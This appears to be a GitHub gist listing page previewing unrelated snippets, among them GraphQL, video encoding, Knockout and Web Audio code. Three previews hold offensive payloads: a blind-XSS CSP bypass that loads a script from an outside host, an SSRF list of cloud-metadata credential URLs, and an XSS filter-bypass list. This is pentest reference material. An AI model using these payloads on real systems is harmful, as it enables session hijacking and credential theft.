Alexander Prinzhorn Prinzhorn

@Rhynorater
Rhynorater / gist:311cf3981fda8303d65c27316e69209f
Last active May 8, 2020
BXSS - CSP Bypass with Inline and Eval
d=document;f=d.createElement("iframe");f.src=d.querySelector('link[href*=".css"]').href;d.body.append(f);s=d.createElement("script");s.src="https://rhy.xss.ht";setTimeout(function(){f.contentWindow.document.head.append(s);},1000)
@a7v8x
a7v8x / graphql_introspection_query.graphql
Last active May 28, 2020
GraphQL introspection query - for fetching the whole schema (from GraphiQL IDE) for https://atheros.ai/blog/graphql-introspection-and-introspection-queries
query IntrospectionQuery {
  __schema {
    queryType { name }
    mutationType { name }
    types {
      ...FullType
    }
    directives {
      name
      description
@jhaddix
jhaddix / cloud_metadata.txt
Last active May 30, 2020 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@maxogden
maxogden / bibtex.png
Last active May 30, 2020
How to make a scientific looking PDF from markdown (with bibliography)
@rvrsh3ll
rvrsh3ll / xxsfilterbypass.lst
Last active May 30, 2020
XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
@Vestride
Vestride / encoding-video.md
Last active May 30, 2020
Encoding video for the web

Encoding Video

Installing

Install FFmpeg with homebrew. You'll need to install it with a couple flags for webm and the AAC audio codec.

brew install ffmpeg --with-libvpx --with-libvorbis --with-fdk-aac --with-opus
@hueniverse
hueniverse / gist:7686452
Last active May 26, 2020
Walmart Mobile node.js Setup

Overview

We run multiple server processes in two data centers. Each process listens on two ports, one for HTTP and one for HTTPS. HTTPS is terminated by Apache prior to reaching node.js. HTTP goes directly from the client to node.js (through a master load balancer). We do not use clusters. We slice our physical servers into thin virtual machines running SmartOS, each with about 3GB of memory designed for a single node.js process.

Our node.js servers are hapi.js servers using the composer functionality and plugins architecture. We have three sets of plugins loaded: mobile web front end experience (single page app), legacy API reverse proxy, and monitoring.

We also serve original node.js services off another server zone which runs closed source plugins using hapi.

Analytics

@hyle
hyle / ko.utils.3.0.0.signatures.js
Created Oct 25, 2013
KnockoutJS 3.0.0 utils (ko.utils) signatures
// knockout 3.0.0
ko.utils.addOrRemoveItem = function (array, value, included) { /* .. */ }
ko.utils.anyDomNodeIsAttachedToDocument = function (nodes) { /* .. */ }
ko.utils.arrayFilter = function (array, predicate) { /* .. */ }
ko.utils.arrayFirst = function (array, predicate, predicateOwner) { /* .. */ }
@ichabodcole
ichabodcole / Web Audio API - Sound Fading
Created Jul 3, 2013
Reference for fading in and out sounds with the Web Audio API
fadeTo: (value, fadeLength)->
  fadeLength = fadeLength || @defaultfadeLength
  currentTime = @ctx.currentTime
  # time the fade should complete
  fadeTime = currentTime + fadeLength
  # set the start time
  @masterGain.gain.setValueAtTime(@userVolume, currentTime)
  @masterGain.gain.linearRampToValueAtTime(value, fadeTime)
fadeOut: (fadeLength)->
@willurd
willurd / web-servers.md
Last active Jun 1, 2020
Big list of http static server one-liners

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000